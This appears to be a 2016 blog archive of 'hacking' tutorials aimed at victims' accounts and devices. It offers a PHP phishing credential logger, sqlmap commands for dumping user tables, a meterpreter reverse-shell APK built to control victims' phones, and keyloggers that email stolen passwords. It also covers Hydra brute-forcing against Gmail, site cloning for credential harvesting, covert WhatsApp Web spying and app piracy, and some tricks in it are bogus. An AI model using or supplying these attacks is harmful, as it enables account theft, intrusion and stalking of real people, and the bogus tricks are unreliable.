Showing posts with label how to hack facebook. Show all posts
Showing posts with label how to hack facebook. Show all posts

Monday, 28 November 2016

facebook hack using html




THIS IS NEW WAY OF FACEBOOK HACK USING HTML CODE


STEP 1-LOGIN TO YOUR ACCOUNT



STEP 2- SEARCH VICTIMS USERNAME

STEP 3- LOGOUT YOUR ACCOUNT THEN GIVE FORGOT PASSWORD


STEP 4- TYPE USERNAME AS VICTIM ID AND GIVE SEARCH

STEP 5- IN RESET MENU RIGHT CLICK AND SELECT INSPECT ELEMENT

STEP 6- IN PSASWORD RESET CODE HTML GIVE EDIT-->HTML THEN COPY THE GIVE CODE BELOW AND GIVE CONTINUE THEN IT WILL ASK YOU TO GIVE NEW PASSWORD TO VICTIM ACCOUNT THATS IT

 

 

HTML CODE

<form method="post" action="/recover/password?u=(VICTIM USERNAME)&amp;n=389548" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" id="u_0_4"><input type="hidden" name="lsd" value="AVoH0gpvlk4" autocomplete="off"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat _ohf"><h2 class="accessible_elem">Choose a new password</h2><div class="uiHeaderActions"></div></div><div><h2 class="uiHeaderTitle" aria-hidden="true">Choose a new password</h2></div></div></div><div class="phl ptm uiInterstitialContent"><div class="mvm uiP fsm">A strong password is a combination of letters and punctuation marks. It must be at least 6 characters long.</div><table class="uiInfoTable" role="presentation"><tbody><tr class="dataRow"><th class="label"><label for="password_new">New Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_new" name="password_new" tabindex="1" autocomplete="off"><label class="mls uiButton" for="u_0_0"><input value="?" onclick="show_pwd_help(); return false;" tabindex="3" type="button" id="u_0_0"></label><div id="password_new_status"></div></td></tr><tr class="dataRow"><th class="label"><label for="password_confirm">Confirm Password</label></th><td class="data"><input type="password" class="passwordinput" id="password_confirm" name="password_confirm" tabindex="2" autocomplete="off"><div id="password_confirm_status"></div></td></tr></tbody></table><div class="mvl"><div class="mvm">To make sure your account's secure, we can log you out of any other computers and phones. You can log back in with your new password.</div><div class="mvm"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" checked="1" name="reason" value="kill_sessions" onclick="CSS.hide(ge(&quot;chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_1"><label for="u_0_1" class="uiInputLabelLabel">Log me out of other devices</label></div><div class="uiInputLabel clearfix uiInputLabelLegacy"><input type="radio" name="reason" value="keep_sessions" onclick="CSS.show(ge(&quot;chpw_survey_hacked_warn&quotWink)" class="uiInputLabelInput uiInputLabelRadio" id="u_0_2"><label for="u_0_2" class="uiInputLabelLabel">Keep me logged in</label></div></div><div class="mtm hidden_elem" id="chpw_survey_hacked_warn" style="color:red;">If your account was hacked, please select "Log me out of other devices"</div></div></div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class="uiButton uiButtonConfirm" id="btn_continue" for="u_0_3"><input value="Continue" name="btn_continue" type="submit" id="u_0_3"></label><a class="uiButton" href="/" role="button" name="reset_action"><span class="uiButtonText">Cancel</span></a></div><div class="pts"></div></div></div></div></form>
Read More

Tuesday, 15 November 2016

facebook hack-phishing method

how to hack facebook..,gmail., twitter.,or yahoo using phishing attack???

Here you can see how to hack facebook using phishing  attack with step by step procedure..using kali linux this is best tutorial ever you tried because normaly you will download source page and send to victim but now a days hosting wont allows you  to upload vulnerable files so that you cant upload any vulnerable files over there its difficult for users so i have made an extradinory tutorial

DOWNLOAD ---  WEEMAN 

step 1- cd Desktop/weeman-master

step 2- ls

step 3-sudo ./weeman.py


step 4-set url (your reomended site example http://www.facebook.com)

step5- set action_url http://(your recomended site)

step 6- set port 8080

step 7 -run

thats it it will shows you server just copy it and send to victim he wil enter his login details so that you can see it in your weeman
Read More

Thursday, 10 November 2016

Website Hacking



Now you can hack any websites using sql method just follow these below commands



step 1-search for sql websites "php?id=1 or...2.,3..etc

step 2- in terminal sqlmap -u (website url) --dbs

step 3- sqlmap -u (website url) -D

step 4- sqlmap -u (website url) -D  (database which we found) --tables

step 5- sqlmap -u (website url) -D (database) -T (login or user smthng) --columns

step 6- sqlmap -u (website url) -D (database) -T (login or user smthng) -C (username or password) --dump



Read More

Tuesday, 8 November 2016

Email Sending Keyloger using Visual Studio


This is email sending keyloger which means you going to code this tool with your email address so that when the victim install this tool and enters his / her login detail it wil send the logs to your email address ..whats the special thing in this tool was.. "you gonna create it"...

first install visual studio..


after that open new project  ========>> windows application

then create a layout for an tool and place the code inside that tool layout copy the below code ( coded by hackfate)


ImportsSystem.Net.Mail
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
            MyMailMessage.From = New MailAddress("YOUREMAIL")
            MyMailMessage.To.Add("YOUREMAIL")
            MyMailMessage.Subject = "Log info"
            MyMailMessage.Body = "Name: " & TextBox1.Text & " / Pass: " & TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("YOUREMAIL", "YOUREMAILPASSWORD")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
End Try
End Sub
End Class



Read More

Saturday, 5 November 2016

android pattern bypasser



THINGS NEEDED :

1)Download ADB files with DRIVERS

2)USB CABLE

METHOD :

1) CONNECT YOUR ANDROID PHONE with PC

2)install ADB files in pc

3)open command prompt (win + R )

4)Type ADB devices and press enter 

ADB COMMANDS FOR REMOVING ANDROID PATTERN


ADB shell
su
rm/data/system/gesture.key

 

 

now open your mobile android it will accept any pattern

Read More

jio speed



METHOD-1

CHECK YOUR SPEED WITH  SPEED TEST OR NETWORK VELOCITY 
 Its an simple trick.....
just go to your settings ->data limit

now u can see  your used data and the data u set as default its like( o-40 ) something like that
all u have to do is just make it as zero ( 0 )





now check your speed it will become 2xtimes speeder than before


 

METHOD -2 

First of all change your  NETWORK MODE to LTE

APN SETTINGS



  • PORT-8080
  • SERVER-WWW.WFJIO5%4G.COM
  • AUTHENTICATIO TYPE  -  PAP
  • BEARER - LTE
  • ->SAVE


Now download  SURFEASY from googleplay
-> register it and turn it on ''YOU WIL GET HIGH SPEED DATA"




Read More

android mobile hack



 

OPEN terminal then do the following


step 1- msfvenom -p android/meterpreter/reverse_tcp LHOST=(ur ip address)  LPORT=4444( anything) R> Appname.APK

 

step 2- msfconsole


step 3-use multi/handler

 

step 4-set payload android/meterpreter/reverse_tcp set LHOST( ur ip)

 

 

step 5- set LPORT 4444

step 6- EXPLOIT


thats it u created an exploitable android app....all u have to do is send that app to the victim via email or else u can upload it in some host ask them to download then u can control their mobile

Read More

WHATSAPP HACK



EVERY ONE NEED TO HACK WHATSAPP ACCOUNT OF FRIENDS &&& GF/BF
im going to give the solution for your need...

Its not about using fake tools or softwares..dont waste your time with fake whatsapp tools just follow

my methods...



from your browser make it as desktop view then search for www.web.whatsapp.com






then get your FRIEND or GF/BF mobile.,which you want to spy., open their whatsapp then do the

following its just a 2 sec process so the victim couldnt found out this



you have to just scan that barcode using victim phone thats it .

Read More

NOTEPAD KEYLOGGER






Hey guys its an simple keylogger that you can create your own thing usng notepad no need to download any softwares and tools just follow my methods


step 1- copy this below code and save it as .bat extension


@echo off
color a
title Facebook Hacking :Login:
cls
echo Pleae Enter Your Facebook  Email Address And Password
echo To Hack Any Faceook Account
echo.
echo.
cd"C:\hackedlogs"
set /p user=Email ID:
SET /P pass=Password:
echo Username="%user%" Password="%pass%">hACKED.txt
echo.
echo.
echo Press any key to continue
pause >n
echo Loading.....
echo.
echo.
echo Enter E-Mail ID of Victim
set /p user=Email ID:
echo Username="%user%">Victim.txt
echo.
echo Press any Key to hack this ID
echo.
echo.
pause >
echo.
echo Processing......
echo.
echo.
echo.
echo.
echo.
pause >n




step 2- now send this created file to victim say him its an hacking tool to hack fb or email so he tries to hack someone 


after he open the file it will ask him to enter email and password    
then this keyloger sends u an logs which he enters enjoy it...







Read More

Wednesday, 2 November 2016

FACEBOOK-TWITTER-GMAIL HACK

HERE I WIL TEACH HOW TO HACK FACEBOOK.,TWITTER.,GMAIL.,YAHOO.etc..
USING PHISHING PAGE


step 1- go to facebook.com (login page) optional (twitter.,gmail., yahoo)

step 2-right click ---> page source


step 3- copy that source and paste it in notepad ..then search for action=" https://www.facebook.com/login.php?login_attempt=1 "

then delete 
" https://www.facebook.com/login.php?login_attempt=1 "

and rewrite it as "hack.php" then save it as index.htm

step 4- make another file copy the below php

<?php
header ('Location:http://www.google/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save it as hack.php

step 5- signup in any hosting site eg.,www.my3gb.com

then open flemanager in hosting--->upload both files



after uploading select index file url send it to victim...when victim enters into tht url it wil directs him to fake login page ..after he enters his login details it wil shows u in ur hosting account like below







Read More

Tuesday, 18 October 2016

GMAIL HACK




TO HACK GMAIL ACCOUNT



just enter here to learn complete instructions

in kali linux we can break the security and hack any passwords... now we going

to use hydra



step 1-  open terminal


step 2-#hydra -S -l (VICTIM GMAIL) -P (password list directory) -v -V -e ns -s 465 smtp.gmail.com smtp




then press ENTER

it wil take few min to search the passwords and match it with the server......and finally it wil crack the password






Read More

winzip & winrar password cracking





The most downloaded files from internet are protected by passwords and it asks to complete a  

survey to get password of that file but here you can get a solution for everything you need ...

yes u can crack the password .. :) i wil teach you the methods


ZIP FILE CRACKING  

First download the file which u need.., if i is protected by the password then do the following

its an simple method just download "NSIS" tool from google then open the password protected 

zip file from that tool

then give GENERATE

after that it creates one installer file .... then u just proceed the proces by instaling it

then it EXTRACT  the exact file which is proctected .....thats it u cracked it..



RAR FILE CRACKING 

Open the password protected RAR file ..if  you dont know the password then proceed to cracking

create a password cracker by  yourself

copy this code in note pad

REM ============================================================
REM
@echo off
color B
title Rar Password Cracker
mode con: cols=47 lines=20
copy "C:\Program Files\WinRAR\Unrar.exe"
SET PASS=0
SET TMP=TempFold
MD %TMP%
:RAR
cls
echo ----------------------------------------------
echo                   GET DETAIL
echo ----------------------------------------------
echo.
SET/P "NAME=Enter File Name  : "
IF "%NAME%"=="" goto NERROR
goto GPATH
:NERROR
echo ----------------------------------------------
echo                      ERROR
echo ----------------------------------------------
echo Sorry you can't leave it blank.
pause
goto RAR
:GPATH
SET/P "PATH=Enter Full Path : "
IF "%PATH%"=="" goto PERROR
goto NEXT
:PERROR
echo ----------------------------------------------
echo                      ERROR
echo ----------------------------------------------
echo Sorry you can't leave it blank.
pause
goto RAR
:NEXT
IF EXIST "%PATH%\%NAME%" GOTO SP
goto PATH
:PATH
cls
echo ----------------------------------------------
echo                     ERROR
echo ----------------------------------------------
echo Opppss File does not Exist..
pause
goto RAR
:SP
echo.
echo Generating Password...
echo.
:START
title Cracking Password...
SET /A PASS=%PASS%+1
echo %RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%
UNRAR E -INUL -P%PASS% "%PATH%\%NAME%" "%TMP%"
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %TMP% /Q /S
Del "Unrar.exe"
cls
title Password Found
echo ----------------------------------------------
echo                     CRACKED
echo ----------------------------------------------
echo.
echo PASSWORD FOUND!
echo FILE  = %NAME%
echo CRACKED PASSWORD = %PASS%
pause>NUL
exit
REM ============================================================


create a bat file  then run the bat ENTER the exact NAME and LOCATION

then it proceed to  cracking after few minute it shows the cracked password ...enjoy..:)



Read More

facebook hack-method 1



METHOD-1

Using "KALI LINUX " you could hack facebook gmail anything ..., and also u can clone any site easily and send it to 'victim' ..its a trap to the victim for hacking his / her login details lets begin to hack.



step 1- open social engineering tool ->enter

step 2- select 1st option (social engineering attack)

step 3- select 2nd option (website attack vector)

step 4-use credential harvester attack so press '3'

step 5-Now use site clone


step 6- in this section enter your ip address

step 7- now enter the site which u wanna clone eg..www.facebook.com..,www.gmail.com
im cloning facebook so type (www.facebook.com) without bracket



step 8-it stores in /var/www/html (link)
file name (harvester_date)


THATS IT....YOU CLONED  FACEBOOK
Read More

shortcut virus remover





Shortcut virus is most common one.. we cant remove it permanently at some cases it is deletable if 

you cant delete or your files may got corrupted dont lose your hope i have an solution for that  

you can get your infected files back y following method..


STEP 1 -INSERT YOUR PENDRIVE OR MEMORY CARD WHICH HAVE SHORTCUT VIRUS


STEP 2 -ENTER FOLLOWING COMMAND IN COMMAND PROMPT
             (the drve name which u want ) im using "D" as a drive
                              


"attrib -h -s -r /s /d  D:\*.*  then press enter "  (without quotes)



THATS IT YOU ARE DONE.. ;) 



Read More

paid apps for free



NOW YOU CAN DOWNLOAD PAID APPS FOR FREE






 MANY ANDROID USERS SUFFERS  ABOUT PAID APPS THEYS CAN'T DOWNLOAD SOME  

SPECIAL APPS FOR THEIR SMARTPHONE DUE TO HIGH PRICE IN GOOGLEPLAY

But today we going to break that....im going to give simple tricks so that you can download any paid 

app from googleplay at free of cost
download BLACKMART app for your smartphone then log on to tat app and start downloading any 


paid apps from playstore if u wanna proof just go to below link and see complete tutorial which i 

made just for you.


Read More